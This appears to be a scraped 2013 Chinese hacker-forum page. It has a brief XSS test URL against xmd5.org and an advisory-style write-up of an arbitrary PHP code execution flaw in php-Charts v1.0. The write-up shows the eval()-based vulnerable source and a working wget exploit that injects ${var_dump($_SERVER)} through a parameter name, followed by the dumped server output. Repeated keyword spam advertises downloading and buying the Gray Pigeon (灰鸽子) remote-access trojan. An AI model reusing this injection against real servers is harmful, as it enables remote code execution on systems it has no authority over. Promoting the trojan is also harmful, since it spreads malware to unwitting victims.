|
|
Xmd5(xmd5.org)Xss存在跨站漏洞可能會被入侵
我們在info=后面隨便輸入一些字符
http://www.xmd5.org/md5/getpasssu.asp?info=h3art
1.png (45.31 KB, 下載次數: 435)
下載附件
黑客
2013-1-20 16:43 上傳
2.png (20.25 KB, 下載次數: 460)
下載附件
黑客
2013-1-20 16:44 上傳
php-Charts 任意PHP代碼執行缺陷及修復
影響程序: php-chart_v1.0
程序官方: http://php-charts.com/
缺陷類型: PHP Code Execution.
===============================================================
測試平臺系統: Debian squeeze 6.0.6
服務器軟件版本: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
================================================================
關于程序介紹:
Php-Charts is basically a class which can be used to generate
different charts(Bar, Pie, Doughnut etc.) in different format(PDF, PNG, JPG, HTML)
using different data source(csv, xml, MySQL, MS Sql, MS Access, PostgreSql,
user defined data).
================================================================
缺陷分析
root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php
<?php
require("../lib/phpchart.class.php");
$color_var=array("txt_col","line_col","bg_color");
$cname=$_GET["type"];
$chart=new PHPChart($cname);
foreach($_GET as $key=>$value)
{
if($value!="")
{
if(in_array($key,$color_var))
eval('$chart->'.$key.'="#'.$value.'";');
else if($value=='yes')
eval('$chart->'.$key.'=true;');
else if($value=='no')
eval('$chart->'.$key.'=false;');
else if(is_numeric($value))
eval('$chart->'.$key.'='.$value.';');
else
eval('$chart->'.$key."='".$value."';");
}
}
$chart->genChart();
利用:
root@debian:/tmp# wget 'http:// www.dumiaotech.com //wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt
--2013-01-15 21:19:16-- http://www.dumiaotech.com//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “out.txt”
[ <=> ] 1,917 --.-K/s in 0s
2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]
Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4
array(28) {
["DOCUMENT_ROOT"]=>
string(28) "/etc/apache2/htdocs/hacker1/"
["GATEWAY_INTERFACE"]=>
string(7) "CGI/1.1"
["HTTP_ACCEPT"]=>
string(3) "*/*"
["HTTP_CLIENT_IP"]=>
string(9) "127.0.0.1"
["HTTP_HOST"]=>
string(11) "hacker1.own"
["HTTP_USER_AGENT"]=>
string(21) "Wget/1.12 (linux-gnu)"
["HTTP_VIA"]=>
string(77) "http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)"
["HTTP_X_FORWARDED_FOR"]=>
string(9) "127.0.0.1"
["PATH"]=>
string(4) "/bin"
["PHPRC"]=>
string(14) "/etc/php5/cgi/"
["QUERY_STRING"]=>
string(45) "$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
["REDIRECT_STATUS"]=>
string(3) "200"
["REMOTE_ADDR"]=>
string(9) "127.0.0.1"
["REMOTE_PORT"]=>
string(5) "60830"
["REQUEST_METHOD"]=>
string(3) "GET"
["REQUEST_URI"]=>
string(76) "/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
["SCRIPT_FILENAME"]=>
string(57) "/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php"
["SCRIPT_NAME"]=>
string(30) "/wp/chart/chart/wizard/url.php"
["SERVER_ADDR"]=>
string(9) "127.0.0.1"
["SERVER_ADMIN"]=>
string(21) "webmaster@hacker1.own"
["SERVER_NAME"]=>
string(11) "hacker1.own"
["SERVER_PORT"]=>
string(2) "80"
["SERVER_PROTOCOL"]=>
string(8) "HTTP/1.1"
["SERVER_SIGNATURE"]=>
string(0) ""
["SERVER_SOFTWARE"]=>
string(6) "Apache"
["UNIQUE_ID"]=>
string(24) "UPYOJH8AAQEAAE8eNfMAAAAC"
["PHP_SELF"]=>
string(30) "/wp/chart/chart/wizard/url.php"
["REQUEST_TIME"]=>
int(1358302756)
}
Notice: Undefined variable: in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
root@debian:/tmp#
灰鴿子,灰鴿子使用教程,灰鴿子下載,灰鴿子購買,灰鴿子遠程控制軟件
Example 2:
灰鴿子,灰鴿子使用教程,灰鴿子下載,灰鴿子購買,灰鴿子遠程控制軟件 |
|
加載中...
發表于 2013-1-20 16:45:54
QQ好友和群
收藏